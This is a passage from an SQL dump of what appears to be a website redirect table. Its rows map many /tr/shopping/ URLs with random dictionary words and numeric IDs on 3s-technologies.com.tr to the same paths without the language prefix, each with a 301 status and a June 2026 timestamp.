00:00:00',301),(72161,'https://3s-technologies.com.tr/tr/shopping/woofy/3520662684.html',NULL,'https://3s-technologies.com.tr/shopping/woofy/3520662684.html','',1,0,'2026-06-11 04:15:27','0000-00-00 00:00:00',301),(72162,'https://3s-technologies.com.tr/tr/shopping/acromegaly/1804118060.html',NULL,'https://3s-technologies.com.tr/shopping/acromegaly/1804118060.html','',1,0,'2026-06-11 04:15:30','0000-00-00 00:00:00',301),(72163,'https://3s-technologies.com.tr/tr/shopping/oxyuris/16564410.html',NULL,'https://3s-technologies.com.tr/shopping/oxyuris/16564410.html','',1,0,'2026-06-11 04:15:33','0000-00-00 00:00:00',301),(72164,'https://3s-technologies.com.tr/tr/shopping/chromolithographer/2760315512.html',NULL,'https://3s-technologies.com.tr/shopping/chromolithographer/2760315512.html','',1,0,'2026-06-11 04:15:36','0000-00-00 00:00:00',301),(72165,'https://3s-technologies.com.tr/tr/shopping/rutylene/1655505298.html',NULL,'https://3s-technologies.com.tr/shopping/rutylene/1655505298.html','',1,0,'2026-06-11 04:15:39','0000-00-00 00:00:00',301),(72166,'https://3s-technologies.com.tr/tr/shopping/rolodexr/2124340758.html',NULL,'https://3s-technologies.com.tr/shopping/rolodexr/2124340758.html','',1,0,'2026-06-11 04:15:42','0000-00-00 00:00:00',301),(72167,'https://3s-technologies.com.tr/tr/shopping/mendelian/3204674874.html',NULL,'https://3s-technologies.com.tr/shopping/mendelian/3204674874.html','',1,0,'2026-06-11 04:15:45','0000-00-00 00:00:00',301),(72168,'https://3s-technologies.com.tr/tr/shopping/catanadromous/2447245468.html',NULL,'https://3s-technologies.com.tr/shopping/catanadromous/2447245468.html','',1,0,'2026-06-11 04:15:48','0000-00-00 00:00:00',301),(72169,'https://3s-technologies.com.tr/tr/shopping/incastelled/993076066.html',NULL,'https://3s-technologies.com.tr/shopping/incastelled/993076066.html','',1,0,'2026-06-11 04:15:51','0000-00-00 00:00:00',301),(72170,'https://3s-technologies.com.tr/tr/shopping/pettitoes/755649295.html',NULL,'https://3s-technologies.com.tr/shopping/pettitoes/755649295.html','',1,0,'2026-06-11 04:15:54','0000-00-00 00:00:00',301),(72171,'https://3s-technologies.com.tr/tr/shopping/hosanna/247444264.html',NULL,'https://3s-technologies.com.tr/shopping/hosanna/247444264.html','',1,0,'2026-06-11 04:15:57','0000-00-00 00:00:00',301),(72172,'https://3s-technologies.com.tr/tr/shopping/coeternal/3583702324.html',NULL,'https://3s-technologies.com.tr/shopping/coeternal/3583702324.html','',1,0,'2026-06-11 04:16:00','0000-00-00 00:00:00',301),(72173,'https://3s-technologies.com.tr/tr/shopping/gasolene/1810744923.html',NULL,'https://3s-technologies.com.tr/shopping/gasolene/1810744923.html','',1,0,'2026-06-11 04:16:08','0000-00-00 00:00:00',301),(72174,'https://3s-technologies.com.tr/tr/shopping/upsarokas/3652410413.html',NULL,'https://3s-technologies.com.tr/shopping/upsarokas/3652410413.html','',1,0,'2026-06-11 04:16:10','0000-00-00 00:00:00',301),(72175,'https://3s-technologies.com.tr/tr/shopping/coelogenys/2281111914.html',NULL,'https://3s-technologies.com.tr/shopping/coelogenys/2281111914.html','',1,0,'2026-06-11 04:16:14','0000-00-00 00:00:00',301),(72176,'https://3s-technologies.com.tr/tr/shopping/neighbour/2765730276.html',NULL,'https://3s-technologies.com.tr/shopping/neighbour/2765730276.html','',1,0,'2026-06-11 04:16:16','0000-00-00 00:00:00',301),(72177,'https://3s-technologies.com.tr/tr/shopping/fluocerine/1411706493.html',NULL,'https://3s-technologies.com.tr/shopping/fluocerine/1411706493.html','',1,0,'2026-06-11 04:16:19','0000-00-00 00:00:00',301),(72178,'https://3s-technologies.com.tr/tr/shopping/ovisac/2925039109.html',NULL,'https://3s-technologies.com.tr/shopping/ovisac/2925039109.html','',1,0,'2026-06-11 04:16:22','0000-00-00 00:00:00',301),(72179,'https://3s-technologies.com.tr/tr/shopping/paragnathous/1710452846.html',NULL,'https://3s-technologies.com.tr/shopping/paragnathous/1710452846.html','',1,0,'2026-06-11 04:16:25','0000-00-00 00:00:00',301),(72180,'https://3s-technologies.com.tr/tr/shopping/lunge/2776205321.html',NULL,'https://3s-technologies.com.tr/shopping/lunge/2776205321.html','',1,0,'2026-06-11 04:16:28','0000-00-00 00:00:00',301),(72181,'https://3s-technologies.com.tr/tr/shopping/partita/936372974.html',NULL,'https://3s-technologies.com.tr/shopping/partita/936372974.html','',1,0,'2026-06-11 04:16:31','0000-00-00 00:00:00',301),(72182,'https://3s-technologies.com.tr/tr/shopping/muscovy/1143027133.html',NULL,'https://3s-technologies.com.tr/shopping/muscovy/1143027133.html','',1,0,'2026-06-11 04:16:34','0000-00-00 00:00:00',301),(72183,'https://3s-technologies.com.tr/tr/shopping/xylophaga/2753493022.html',NULL,'https://3s-technologies.com.tr/shopping/xylophaga/2753493022.html','',1,0,'2026-06-11 04:16:40','0000-00-00 00:00:00',301),(72184,'https://3s-technologies.com.tr/tr/shopping/europaeum/2614055502.html',NULL,'https://3s-technologies.com.tr/shopping/europaeum/2614055502.html','',1,0,'2026-06-11 04:16:42','0000-00-00 00:00:00',301),(72185,'https://3s-technologies.com.tr/tr/shopping/marchantiaceae/2614219025.html',NULL,'https://3s-technologies.com.tr/shopping/marchantiaceae/2614219025.html','',1,0,'2026-06-11 04:16:45','0000-00-00 00:00:00',301),(72186,'https://3s-technologies.com.tr/tr/shopping/somnambulic/1639362327.html',NULL,'https://3s-technologies.com.tr/shopping/somnambulic/1639362327.html','',1,0,'2026-06-11 04:16:48','0000-00-00 00:00:00',301),(72187,'https://3s-technologies.com.tr/tr/shopping/dulcamara/1939249317.html',NULL,'https://3s-technologies.com.tr/shopping/dulcamara/1939249317.html','',1,0,'2026-06-11 04:16:51','0000-00-00 00:00:00',301),(72188,'https://3s-technologies.com.tr/tr/shopping/highchurchman/3191563282.html',NULL,'https://3s-technologies.com.tr/shopping/highchurchman/3191563282.html','',1,0,'2026-06-11 04:16:54','0000-00-00 00:00:00',301),(72189,'https://3s-technologies.com.tr/tr/shopping/terpilene/3740114986.html',NULL,'https://3s-technologies.com.tr/shopping/terpilene/3740114986.html','',1,0,'2026-06-11 04:16:57','0000-00-00 00:00:00',301),(72190,'https://3s-technologies.com.tr/tr/shopping/aerolitic/4108953943.html',NULL,'https://3s-technologies.com.tr/shopping/aerolitic/4108953943.html','',1,0,'2026-06-11 04:17:00','0000-00-00 00:00:00',301),(72191,'https://3s-technologies.com.tr/tr/shopping/betrothment/1455150535.html',NULL,'https://3s-technologies.com.tr/shopping/betrothment/1455150535.html','',1,0,'2026-06-11 04:17:03','0000-00-00 00:00:00',301),(72192,'https://3s-technologies.com.tr/tr/shopping/ceroma/3809462988.html',NULL,'https://3s-technologies.com.tr/shopping/ceroma/3809462988.html','',1,0,'2026-06-11 04:17:06','0000-00-00 00:00:00',301),(72193,'https://3s-technologies.com.tr/tr/shopping/fashionless/1452726353.html',NULL,'https://3s-technologies.com.tr/shopping/fashionless/1452726353.html','',1,0,'2026-06-11 04:17:10','0000-00-00 00:00:00',301),(72194,'https://3s-technologies.com.tr/tr/shopping/jabbernowl/1684363842.html',NULL,'https://3s-technologies.com.tr/shopping/jabbernowl/1684363842.html','',1,0,'2026-06-11 04:17:12','0000-00-00 00:00:00',301),(72195,'https://3s-technologies.com.tr/tr/shopping/campanulaceous/4003431236.html',NULL,'https://3s-technologies.com.tr/shopping/campanulaceous/4003431236.html','',1,0,'2026-06-11 04:17:15','0000-00-00 00:00:00',301),(72196,'https://3s-technologies.com.tr/tr/shopping/xylophilous/570069623.html',NULL,'https://3s-technologies.com.tr/shopping/xylophilous/570069623.html','',1,0,'2026-06-11 04:17:18','0000-00-00 00:00:00',301),(72197,'https://3s-technologies.com.tr/tr/shopping/oosporangium/2746134678.html',NULL,'https://3s-technologies.com.tr/shopping/oosporangium/2746134678.html','',1,0,'2026-06-11 04:17:21','0000-00-00 00:00:00',301),(72198,'https://3s-technologies.com.tr/tr/shopping/trihedron/2508136760.html',NULL,'https://3s-technologies.com.tr/shopping/trihedron/2508136760.html','',1,0,'2026-06-11 04:17:25','0000-00-00 00:00:00',301),(72199,'https://3s-technologies.com.tr/tr/shopping/prizemen/3467317985.html',NULL,'https://3s-technologies.com.tr/shopping/prizemen/3467317985.html','',1,0,'2026-06-11 04:17:27','0000-00-00 00:00:00',301),(72200,'https://3s-technologies.com.tr/tr/shopping/hognut/658515196.html',NULL,'https://3s-technologies.com.tr/shopping/hognut/658515196.html','',1,0,'2026-06-11 04:17:30','0000-00-00 00:00:00',301),(72201,'https://3s-technologies.com.tr/tr/shopping/disembowelment/3272878590.html',NULL,'https://3s-technologies.com.tr/shopping/disembowelment/3272878590.html','',1,0,'2026-06-11 04:17:33','0000-00-00 00:00:00',301),(72202,'https://3s-technologies.com.tr/tr/shopping/recrementitial/2359910963.html',NULL,'https://3s-technologies.com.tr/shopping/recrementitial/2359910963.html','',1,0,'2026-06-11 04:17:36','0000-00-00 00:00:00',301),(72203,'https://3s-technologies.com.tr/tr/shopping/necrotomist/1635350984.html',NULL,'https://3s-technologies.com.tr/shopping/necrotomist/1635350984.html','',1,0,'2026-06-11 04:17:39','0000-00-00 00:00:00',301),(72204,'https://3s-technologies.com.tr/tr/shopping/congratulate/1219691296.html',NULL,'https://3s-technologies.com.tr/shopping/congratulate/1219691296.html','',1,0,'2026-06-11 04:23:02','0000-00-00 00:00:00',301),(72205,'https://3s-technologies.com.tr/tr/shopping/crystallization/3470223527.html',NULL,'https://3s-technologies.com.tr/shopping/crystallization/3470223527.html','',1,0,'2026-06-11 04:24:17','0000-00-00 00:00:00',301),(72206,'https://3s-technologies.com.tr/tr/shopping/squawroot/435345339.html',NULL,'https://3s-technologies.com.tr/shopping/squawroot/435345339.html','',1,0,'2026-06-11 04:28:03','0000-00-00 00:00:00',301),(72207,'https://3s-technologies.com.tr/tr/shopping/panzer/1751206372.html',NULL,'https://3s-technologies.com.tr/shopping/panzer/1751206372.html','',1,0,'2026-06-11 04:28:08','0000-00-00 00:00:00',301),(72208,'https://3s-technologies.com.tr/tr/shopping/clapping/1487726599.html',NULL,'https://3s-technologies.com.tr/shopping/clapping/1487726599.html','',1,0,'2026-06-11 04:28:11','0000-00-00 00:00:00',301),(72209,'https://3s-technologies.com.tr/tr/shopping/certification/2539335019.html',NULL,'https://3s-technologies.com.tr/shopping/certification/2539335019.html','',1,0,'2026-06-11 04:28:14','0000-00-00 00:00:00',301),(72210,'https://3s-technologies.com.tr/tr/shopping/modification/3638307616.html',NULL,'https://3s-technologies.com.tr/shopping/modification/3638307616.html','',1,0,'2026-06-11 04:28:17','0000-00-00 00:00:00',301),(72211,'https://3s-technologies.com.tr/tr/shopping/demonizing/307273840.html',NULL,'https://3s-technologies.com.tr/shopping/demonizing/307273840.html','',1,0,'2026-06-11 04:28:20','0000-00-00 00:00:00',301),(72212,'https://3s-technologies.com.tr/tr/shopping/intriguing/1001694971.html',NULL,'https://3s-technologies.com.tr/shopping/intriguing/1001694971.html','',1,0,'2026-06-11 04:28:23','0000-00-00 00:00:00',301),(72213,'https://3s-technologies.com.tr/tr/shopping/clockwise/524743387.html',NULL,'https://3s-technologies.com.tr/shopping/clockwise/524743387.html','',1,0,'2026-06-11 04:28:26','0000-00-00 00:00:00',301),(72214,'https://3s-technologies.com.tr/tr/shopping/combless/26299345.html',NULL,'https://3s-technologies.com.tr/shopping/combless/26299345.html','',1,0,'2026-06-11 04:28:37','0000-00-00 00:00:00',301),(72215,'https://3s-technologies.com.tr/tr/shopping/venatica/418597418.html',NULL,'https://3s-technologies.com.tr/shopping/venatica/418597418.html','',1,0,'2026-06-11 04:28:39','0000-00-00 00:00:00',301),(72216,'https://3s-technologies.com.tr/tr/shopping/translating/2298545992.html',NULL,'https://3s-technologies.com.tr/shopping/translating/2298545992.html','',1,0,'2026-06-11 04:28:42','0000-00-00 00:00:00',301),(72217,'https://3s-technologies.com.tr/tr/shopping/refrain/1330416634.html',NULL,'https://3s-technologies.com.tr/shopping/refrain/1330416634.html','',1,0,'2026-06-11 04:28:45','0000-00-00 00:00:00',301),(72218,'https://3s-technologies.com.tr/tr/shopping/amazon/1378990726.html',NULL,'https://3s-technologies.com.tr/shopping/amazon/1378990726.html','',1,0,'2026-06-11 04:28:48','0000-00-00 00:00:00',301),(72219,'https://3s-technologies.com.tr/tr/shopping/declinous/1727327366.html',NULL,'https://3s-technologies.com.tr/shopping/declinous/1727327366.html','',1,0,'2026-06-11 04:28:51','0000-00-00 00:00:00',301),(72220,'https://3s-technologies.com.tr/tr/shopping/compounding/2772184607.html',NULL,'https://3s-technologies.com.tr/shopping/compounding/2772184607.html','',1,0,'2026-06-11 04:28:54','0000-00-00 00:00:00',301),(72221,'https://3s-technologies.com.tr/tr/shopping/desolate/1612629298.html',NULL,'https://3s-technologies.com.tr/shopping/desolate/1612629298.html','',1,0,'2026-06-11 04:28:57','0000-00-00 00:00:00',301),(72222,'https://3s-technologies.com.tr/tr/shopping/discrepance/2794032364.html',NULL,'https://3s-technologies.com.tr/shopping/discrepance/2794032364.html','',1,0,'2026-06-11 04:29:05','0000-00-00 00:00:00',301),(72223,'https://3s-technologies.com.tr/tr/shopping/actualization/378200804.html',NULL,'https://3s-technologies.com.tr/shopping/actualization/378200804.html','',1,0,'2026-06-11 04:29:07','0000-00-00 00:00:00',301),(72224,'https://3s-technologies.com.tr/tr/shopping/drained/950121897.html',NULL,'https://3s-technologies.com.tr/shopping/drained/950121897.html','',1,0,'2026-06-11 04:29:10','0000-00-00 00:00:00',301),(72225,'https://3s-technologies.com.tr/tr/shopping/illocality/783077013.html',NULL,'https://3s-technologies.com.tr/shopping/illocality/783077013.html','',1,0,'2026-06-11 04:29:13','0000-00-00 00:00:00',301),(72226,'https://3s-technologies.com.tr/tr/shopping/esteemable/3731505484.html',NULL,'https://3s-technologies.com.tr/shopping/esteemable/3731505484.html','',1,0,'2026-06-11 04:29:16','0000-00-00 00:00:00',301),(72227,'https://3s-technologies.com.tr/tr/shopping/robustiousness/1362684248.html',NULL,'https://3s-technologies.com.tr/shopping/robustiousness/1362684248.html','',1,0,'2026-06-11 04:29:19','0000-00-00 00:00:00',301),(72228,'https://3s-technologies.com.tr/tr/shopping/spangled/3493140671.html',NULL,'https://3s-technologies.com.tr/shopping/spangled/3493140671.html','',1,0,'2026-06-11 04:29:32','0000-00-00 00:00:00',301),(72229,'https://3s-technologies.com.tr/tr/shopping/difficileness/1684931900.html',NULL,'https://3s-technologies.com.tr/shopping/difficileness/1684931900.html','',1,0,'2026-06-11 04:29:34','0000-00-00 00:00:00',301),(72230,'https://3s-technologies.com.tr/tr/shopping/declined/3603875396.html',NULL,'https://3s-technologies.com.tr/shopping/declined/3603875396.html','',1,0,'2026-06-11 04:29:37','0000-00-00 00:00:00',301),(72231,'https://3s-technologies.com.tr/tr/shopping/anthill/2590073685.html',NULL,'https://3s-technologies.com.tr/shopping/anthill/2590073685.html','',1,0,'2026-06-11 04:29:40','0000-00-00 00:00:00',301),(72232,'https://3s-technologies.com.tr/tr/shopping/emendable/2430601345.html',NULL,'https://3s-technologies.com.tr/shopping/emendable/2430601345.html','',1,0,'2026-06-11 04:29:43','0000-00-00 00:00:00',301),(72233,'https://3s-technologies.com.tr/tr/shopping/percale/1760383964.html',NULL,'https://3s-technologies.com.tr/shopping/percale/1760383964.html','',1,0,'2026-06-11 04:29:46','0000-00-00 00:00:00',301),(72234,'https://3s-technologies.com.tr/tr/shopping/refragable/314286810.html',NULL,'https://3s-technologies.com.tr/shopping/refragable/314286810.html','',1,0,'2026-06-11 04:29:49','0000-00-00 00:00:00',301),(72235,'https://3s-technologies.com.tr/tr/shopping/coregent/2321865472.html',NULL,'https://3s-technologies.com.tr/shopping/coregent/2321865472.html','',1,0,'2026-06-11 04:29:52','0000-00-00 00:00:00',301),(72236,'https://3s-technologies.com.tr/tr/shopping/seduction/3056535791.html',NULL,'https://3s-technologies.com.tr/shopping/seduction/3056535791.html','',1,0,'2026-06-11 04:29:55','0000-00-00 00:00:00',301),(72237,'https://3s-technologies.com.tr/tr/shopping/aptive/955922800.html',NULL,'https://3s-technologies.com.tr/shopping/aptive/955922800.html','',1,0,'2026-06-11 04:29:58','0000-00-00 00:00:00',301),(72238,'https://3s-technologies.com.tr/tr/shopping/ceanothus/2403345650.html',NULL,'https://3s-technologies.com.tr/shopping/ceanothus/2403345650.html','',1,0,'2026-06-11 04:30:01','0000-00-00 00:00:00',301),(72239,'https://3s-technologies.com.tr/tr/shopping/embassies/328610517.html',NULL,'https://3s-technologies.com.tr/shopping/embassies/328610517.html','',1,0,'2026-06-11 04:30:04','0000-00-00 00:00:00',301),(72240,'https://3s-technologies.com.tr/tr/shopping/caking/1403704124.html',NULL,'https://3s-technologies.com.tr/shopping/caking/1403704124.html','',1,0,'2026-06-11 04:30:07','0000-00-00 00:00:00',301),(72241,'https://3s-technologies.com.tr/tr/shopping/schema/2056894249.html',NULL,'https://3s-technologies.com.tr/shopping/schema/2056894249.html','',1,0,'2026-06-11 04:30:10','0000-00-00 00:00:00',301),(72242,'https://3s-technologies.com.tr/tr/shopping/theoretic/511631763.html',NULL,'https://3s-technologies.com.tr/shopping/theoretic/511631763.html','',1,0,'2026-06-11 04:30:13','0000-00-00 00:00:00',301),(72243,'https://3s-technologies.com.tr/tr/shopping/conductivity/781864930.html',NULL,'https://3s-technologies.com.tr/shopping/conductivity/781864930.html','',1,0,'2026-06-11 04:30:16','0000-00-00 00:00:00',301),(72244,'https://3s-technologies.com.tr/tr/shopping/interlaced/2646069825.html',NULL,'https://3s-technologies.com.tr/shopping/interlaced/2646069825.html','',1,0,'2026-06-11 04:30:19','0000-00-00 00:00:00',301),(72245,'https://3s-technologies.com.tr/tr/shopping/impuberty/2787115447.html',NULL,'https://3s-technologies.com.tr/shopping/impuberty/2787115447.html','',1,0,'2026-06-11 04:30:22','0000-00-00 00:00:00',301),(72246,'https://3s-technologies.com.tr/tr/shopping/marrer/1094476019.html',NULL,'https://3s-technologies.com.tr/shopping/marrer/1094476019.html','',1,0,'2026-06-11 04:30:25','0000-00-00 00:00:00',301),(72247,'https://3s-technologies.com.tr/tr/shopping/lectured/544712200.html',NULL,'https://3s-technologies.com.tr/shopping/lectured/544712200.html','',1,0,'2026-06-11 04:30:28','0000-00-00 00:00:00',301),(72248,'https://3s-technologies.com.tr/tr/shopping/cense/2901979253.html',NULL,'https://3s-technologies.com.tr/shopping/cense/2901979253.html','',1,0,'2026-06-11 04:30:31','0000-00-00 00:00:00',301),(72249,'https://3s-technologies.com.tr/tr/shopping/nitrite/3111256112.html',NULL,'https://3s-technologies.com.tr/shopping/nitrite/3111256112.html','',1,0,'2026-06-11 04:30:34','0000-00-00 00:00:00',301),(72250,'https://3s-technologies.com.tr/tr/shopping/acidulated/3204290441.html',NULL,'https://3s-technologies.com.tr/shopping/acidulated/3204290441.html','',1,0,'2026-06-11 04:30:37','0000-00-00 00:00:00',301),(72251,'https://3s-technologies.com.tr/tr/shopping/improver/3501106132.html',NULL,'https://3s-technologies.com.tr/shopping/improver/3501106132.html','',1,0,'2026-06-11 04:30:40','0000-00-00 00:00:00',301),(72252,'https://3s-technologies.com.tr/tr/shopping/anomy/3753958191.html',NULL,'https://3s-technologies.com.tr/shopping/anomy/3753958191.html','',1,0,'2026-06-11 04:30:45','0000-00-00 00:00:00',301),(72253,'https://3s-technologies.com.tr/tr/shopping/zonal/2022791290.html',NULL,'https://3s-technologies.com.tr/shopping/zonal/2022791290.html','',1,0,'2026-06-11 04:30:47','0000-00-00 00:00:00',301),(72254,'https://3s-technologies.com.tr/tr/shopping/abjudication/408044236.html',NULL,'https://3s-technologies.com.tr/shopping/abjudication/408044236.html','',1,0,'2026-06-11 04:30:50','0000-00-00 00:00:00',301),(72255,'https://3s-technologies.com.tr/tr/shopping/marchman/37853496.html',NULL,'https://3s-technologies.com.tr/shopping/marchman/37853496.html','',1,0,'2026-06-11 04:30:53','0000-00-00 00:00:00',301),(72256,'https://3s-technologies.com.tr/tr/shopping/illicitly/4005374916.html',NULL,'https://3s-technologies.com.tr/shopping/illicitly/4005374916.html','',1,0,'2026-06-11 04:30:56','0000-00-00 00:00:00',301),(72257,'https://3s-technologies.com.tr/tr/shopping/littleneck/3957949219.html',NULL,'https://3s-technologies.com.tr/shopping/littleneck/3957949219.html','',1,0,'2026-06-11 04:30:59','0000-00-00 00:00:00',301),(72258,'https://3s-technologies.com.tr/tr/shopping/torrefy/4006327423.html',NULL,'https://3s-technologies.com.tr/shopping/torrefy/4006327423.html','',1,0,'2026-06-11 04:31:02','0000-00-00 00:00:00',301),(72259,'https://3s-technologies.com.tr/tr/shopping/rationalize/1540801810.html',NULL,'https://3s-technologies.com.tr/shopping/rationalize/1540801810.html','',1,0,'2026-06-11 04:31:05','0000-00-00 00:00:00',301),(72260,'https://3s-technologies.com.tr/tr/shopping/adays/2758986301.html',NULL,'https://3s-technologies.com.tr/shopping/adays/2758986301.html','',1,0,'2026-06-11 04:31:08','0000-00-00 00:00:00',301),(72261,'https://3s-technologies.com.tr/tr/shopping/crestfallen/1937549019.html',NULL,'https://3s-technologies.com.tr/shopping/crestfallen/1937549019.html','',1,0,'2026-06-11 04:31:11','0000-00-00 00:00:00',301),(72262,'https://3s-technologies.com.tr/tr/shopping/lenitiveness/886021386.html',NULL,'https://3s-technologies.com.tr/shopping/lenitiveness/886021386.html','',1,0,'2026-06-11 04:31:14','0000-00-00 00:00:00',301),(72263,'https://3s-technologies.com.tr/tr/shopping/ichthyocol/4200068460.html',NULL,'https://3s-technologies.com.tr/shopping/ichthyocol/4200068460.html','',1,0,'2026-06-11 04:31:17','0000-00-00 00:00:00',301),(72264,'https://3s-technologies.com.tr/tr/shopping/appetize/2076915061.html',NULL,'https://3s-technologies.com.tr/shopping/appetize/2076915061.html','',1,0,'2026-06-11 04:31:20','0000-00-00 00:00:00',301),(72265,'https://3s-technologies.com.tr/tr/shopping/ensuable/201481629.html',NULL,'https://3s-technologies.com.tr/shopping/ensuable/201481629.html','',1,0,'2026-06-11 04:31:23','0000-00-00 00:00:00',301),(72266,'https://3s-technologies.com.tr/tr/shopping/acadicus/1140248206.html',NULL,'https://3s-technologies.com.tr/shopping/acadicus/1140248206.html','',1,0,'2026-06-11 04:31:26','0000-00-00 00:00:00',301),(72267,'https://3s-technologies.com.tr/tr/shopping/uprighteously/1976804919.html',NULL,'https://3s-technologies.com.tr/shopping/uprighteously/1976804919.html','',1,0,'2026-06-11 04:31:29','0000-00-00 00:00:00',301),(72268,'https://3s-technologies.com.tr/tr/shopping/smack/1900971492.html',NULL,'https://3s-technologies.com.tr/shopping/smack/1900971492.html','',1,0,'2026-06-11 04:31:32','0000-00-00 00:00:00',301),(72269,'https://3s-technologies.com.tr/tr/shopping/buccinalis/530544274.html',NULL,'https://3s-technologies.com.tr/shopping/buccinalis/530544274.html','',1,0,'2026-06-11 04:31:37','0000-00-00 00:00:00',301),(72270,'https://3s-technologies.com.tr/tr/shopping/inquisitively/2209377370.html',NULL,'https://3s-technologies.com.tr/shopping/inquisitively/2209377370.html','',1,0,'2026-06-11 04:31:39','0000-00-00 00:00:00',301),(72271,'https://3s-technologies.com.tr/tr/shopping/purfle/2275879101.html',NULL,'https://3s-technologies.com.tr/shopping/purfle/2275879101.html','',1,0,'2026-06-11 04:31:42','0000-00-00 00:00:00',301),(72272,'https://3s-technologies.com.tr/tr/shopping/vintner/3448106775.html',NULL,'https://3s-technologies.com.tr/shopping/vintner/3448106775.html','',1,0,'2026-06-11 04:31:45','0000-00-00 00:00:00',301),(72273,'https://3s-technologies.com.tr/tr/shopping/proximately/3379440470.html',NULL,'https://3s-technologies.com.tr/shopping/proximately/3379440470.html','',1,0,'2026-06-11 04:31:48','0000-00-00 00:00:00',301),(72274,'https://3s-technologies.com.tr/tr/shopping/shingles/583307862.html',NULL,'https://3s-technologies.com.tr/shopping/shingles/583307862.html','',1,0,'2026-06-11 04:31:51','0000-00-00 00:00:00',301),(72275,'https://3s-technologies.com.tr/tr/shopping/viary/1825673580.html',NULL,'https://3s-technologies.com.tr/shopping/viary/1825673580.html','',1,0,'2026-06-11 04:31:54','0000-00-00 00:00:00',301),(72276,'https://3s-technologies.com.tr/tr/shopping/confederation/808168118.html',NULL,'https://3s-technologies.com.tr/shopping/confederation/808168118.html','',1,0,'2026-06-11 04:31:57','0000-00-00 00:00:00',301),(72277,'https://3s-technologies.com.tr/tr/shopping/callimorpha/656822563.html',NULL,'https://3s-technologies.com.tr/shopping/callimorpha/656822563.html','',1,0,'2026-06-11 04:32:00','0000-00-00 00:00:00',301),(72278,'https://3s-technologies.com.tr/tr/shopping/birthroot/1148818617.html',NULL,'https://3s-technologies.com.tr/shopping/birthroot/1148818617.html','',1,0,'2026-06-11 04:32:03','0000-00-00 00:00:00',301),(72279,'https://3s-technologies.com.tr/tr/shopping/superposed/1205374299.html',NULL,'https://3s-technologies.com.tr/shopping/superposed/1205374299.html','',1,0,'2026-06-11 04:32:06','0000-00-00 00:00:00',301),(72280,'https://3s-technologies.com.tr/tr/shopping/endogamous/2897390481.html',NULL,'https://3s-technologies.com.tr/shopping/endogamous/2897390481.html','',1,0,'2026-06-11 04:32:09','0000-00-00 00:00:00',301),(72281,'https://3s-technologies.com.tr/tr/shopping/beautification/347734158.html',NULL,'https://3s-technologies.com.tr/shopping/beautification/347734158.html','',1,0,'2026-06-11 04:32:12','0000-00-00 00:00:00',301),(72282,'https://3s-technologies.com.tr/tr/shopping/coarsegrained/1143017746.html',NULL,'https://3s-technologies.com.tr/shopping/coarsegrained/1143017746.html','',1,0,'2026-06-11 04:32:15','0000-00-00 00:00:00',301),(72283,'https://3s-technologies.com.tr/tr/shopping/traitorously/240999336.html',NULL,'https://3s-technologies.com.tr/shopping/traitorously/240999336.html','',1,0,'2026-06-11 04:32:18','0000-00-00 00:00:00',301),(72284,'https://3s-technologies.com.tr/tr/shopping/metallical/433969701.html',NULL,'https://3s-technologies.com.tr/shopping/metallical/433969701.html','',1,0,'2026-06-11 04:32:24','0000-00-00 00:00:00',301),(72285,'https://3s-technologies.com.tr/tr/shopping/fireflies/834257138.html',NULL,'https://3s-technologies.com.tr/shopping/fireflies/834257138.html','',1,0,'2026-06-11 04:32:31','0000-00-00 00:00:00',301),(72286,'https://3s-technologies.com.tr/tr/shopping/category/3772551382.html',NULL,'https://3s-technologies.com.tr/shopping/category/3772551382.html','',1,0,'2026-06-11 04:32:33','0000-00-00 00:00:00',301),(72287,'https://3s-technologies.com.tr/tr/shopping/abderite/2232271520.html',NULL,'https://3s-technologies.com.tr/shopping/abderite/2232271520.html','',1,0,'2026-06-11 04:32:36','0000-00-00 00:00:00',301),(72288,'https://3s-technologies.com.tr/tr/shopping/cummerbund/1771063677.html',NULL,'https://3s-technologies.com.tr/shopping/cummerbund/1771063677.html','',1,0,'2026-06-11 04:32:39','0000-00-00 00:00:00',301),(72289,'https://3s-technologies.com.tr/tr/shopping/gutless/791592136.html',NULL,'https://3s-technologies.com.tr/shopping/gutless/791592136.html','',1,0,'2026-06-11 04:32:42','0000-00-00 00:00:00',301),(72290,'https://3s-technologies.com.tr/tr/shopping/terminableness/1605810759.html',NULL,'https://3s-technologies.com.tr/shopping/terminableness/1605810759.html','',1,0,'2026-06-11 04:32:45','0000-00-00 00:00:00',301),(72291,'https://3s-technologies.com.tr/tr/shopping/electric/4091506693.html',NULL,'https://3s-technologies.com.tr/shopping/electric/4091506693.html','',1,0,'2026-06-11 04:32:48','0000-00-00 00:00:00',301),(72292,'https://3s-technologies.com.tr/tr/shopping/walkmill/1327039945.html',NULL,'https://3s-technologies.com.tr/shopping/walkmill/1327039945.html','',1,0,'2026-06-11 04:32:51','0000-00-00 00:00:00',301),(72293,'https://3s-technologies.com.tr/tr/shopping/squireship/2462443629.html',NULL,'https://3s-technologies.com.tr/shopping/squireship/2462443629.html','',1,0,'2026-06-11 04:32:56','0000-00-00 00:00:00',301),(72294,'https://3s-technologies.com.tr/tr/shopping/indurate/3813734781.html',NULL,'https://3s-technologies.com.tr/shopping/indurate/3813734781.html','',1,0,'2026-06-11 04:33:00','0000-00-00 00:00:00',301),(72295,'https://3s-technologies.com.tr/tr/shopping/muttonhead/1134283780.html',NULL,'https://3s-technologies.com.tr/shopping/muttonhead/1134283780.html','',1,0,'2026-06-11 04:33:03','0000-00-00 00:00:00',301),(72296,'https://3s-technologies.com.tr/tr/shopping/sodomy/1847780945.html',NULL,'https://3s-technologies.com.tr/shopping/sodomy/1847780945.html','',1,0,'2026-06-11 04:33:07','0000-00-00 00:00:00',301),(72297,'https://3s-technologies.com.tr/tr/shopping/equilibrity/1010265382.html',NULL,'https://3s-technologies.com.tr/shopping/equilibrity/1010265382.html','',1,0,'2026-06-11 04:33:14','0000-00-00 00:00:00',301),(72298,'https://3s-technologies.com.tr/tr/shopping/bobbysocks/4223733266.html',NULL,'https://3s-technologies.com.tr/shopping/bobbysocks/4223733266.html','',1,0,'2026-06-11 04:33:18','0000-00-00 00:00:00',301),(72299,'https://3s-technologies.com.tr/tr/shopping/menstrua/4108473441.html',NULL,'https://3s-technologies.com.tr/shopping/menstrua/4108473441.html','',1,0,'2026-06-11 04:33:21','0000-00-00 00:00:00',301),(72300,'https://3s-technologies.com.tr/tr/shopping/bumble/3541077416.html',NULL,'https://3s-technologies.com.tr/shopping/bumble/3541077416.html','',1,0,'2026-06-11 04:33:24','0000-00-00 00:00:00',301),(72301,'https://3s-technologies.com.tr/tr/shopping/stratums/1506639094.html',NULL,'https://3s-technologies.com.tr/shopping/stratums/1506639094.html','',1,0,'2026-06-11 04:33:27','0000-00-00 